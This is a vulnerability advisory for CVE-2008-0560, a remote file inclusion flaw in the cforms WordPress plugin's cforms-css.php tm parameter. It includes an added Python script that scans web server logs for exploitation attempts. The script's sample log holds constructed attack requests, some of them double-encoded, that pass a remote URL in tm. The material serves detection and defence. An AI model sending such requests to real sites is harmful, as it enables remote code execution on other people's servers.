PT-2008-2186 · Oliver Seidel · Cforms

Published: 2008-02-04 · Updated: 2024-08-07 · CVE-2008-0560

CVSS v2.0: 6.8 (Medium)

Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions

cforms (contactforms) versions prior to 7.3

Description

This is a PHP remote file inclusion vulnerability in the Oliver Seidel cforms (contactforms) WordPress plugin. It allows remote attackers to execute arbitrary PHP code via a URL in the tm parameter of the cforms-css.php file. Note that version 7.3 is disputed as affected, since it lacks the tm parameter and would result in a fatal error due to an undefined function call.

Recommendations

For versions prior to 7.3, consider disabling the cforms-css.php file or restricting access to it until a patch is available. Avoid using the tm parameter in affected API endpoints until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
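
One way to review web server access logs for requests matching the description above, as an added example that is not part of the original advisory or of the cforms project: it flags requests to cforms-css.php whose tm query value decodes to a URL, including values that were percent-encoded more than once. The log lines, addresses and the plugin directory in them are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined log format (not real traffic).
# Assumption: the plugin directory shown here is illustrative only.
SAMPLE_LOG = """\
198.51.100.7 - - [04/Feb/2008:10:01:02 +0000] "GET /wp-content/plugins/cforms/cforms-css.php?tm=http%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 200 512 "-" "-"
198.51.100.7 - - [04/Feb/2008:10:01:09 +0000] "GET /wp-content/plugins/cforms/cforms-css.php?tm=%2568ttp%253A%252F%252Fremote.example%252Fx HTTP/1.1" 200 512 "-" "-"
203.0.113.9 - - [04/Feb/2008:10:02:00 +0000] "GET /wp-content/plugins/cforms/cforms-css.php HTTP/1.1" 200 2048 "-" "-"
203.0.113.9 - - [04/Feb/2008:10:02:05 +0000] "GET /index.php?tm=http://remote.example/ HTTP/1.1" 200 900 "-" "-"
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
URL_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)  # value starts with scheme://


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_tm_inclusion_attempts(log_text):
    """Return (client_ip, decoded_tm_value) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        parts = urlsplit(m.group("target"))
        # Only the script named in the advisory is of interest.
        if not fully_decode(parts.path).lower().endswith("/cforms-css.php"):
            continue
        for raw in parse_qs(parts.query, keep_blank_values=True).get("tm", []):
            value = fully_decode(raw)
            if URL_RE.match(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in find_tm_inclusion_attempts(SAMPLE_LOG):
        print(f"{ip} requested cforms-css.php with tm={value!r}")
```

Access logs record only the query string, so a tm value sent in a request body would not appear here.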

Code Injection

Weakness Enumeration

Related Identifiers: CVE-2008-0560

Affected Products: Cforms